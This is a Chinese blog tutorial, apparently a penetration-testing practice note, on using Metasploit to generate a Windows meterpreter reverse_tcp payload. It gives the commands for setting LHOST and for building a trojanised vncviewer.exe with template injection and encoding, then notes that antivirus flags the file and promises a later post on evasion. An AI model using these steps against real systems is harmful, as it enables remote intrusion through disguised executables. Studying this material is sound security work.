Metasploit Framework —— Payload

这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的

就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
3331d032d605b7f9aca7fbdb94887c9.png

使用:use payload/windows/meterpreter/reverse_tcp
b32d24bac71d719a87cdd7fb0ac2d0e.png

有无需要配置的地方:show options
04adee39acee01087d94259dfa38e83.png

配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
bba11668d713863598f4f5a4ca87c34.png

生成该 shellcode 的时候我们可以查看一下帮助:
43663a0ec9fc98f52651217a8d3bf7a.png

其中最常用的有:
!!!

-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…

在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
22a69391c2b1b1d102e8791e0d6918e.png

把生成的 exe 文件拉到 win10 看看:
0ca83f975c67d6007762ab5338a6631.png

好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~

😄

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值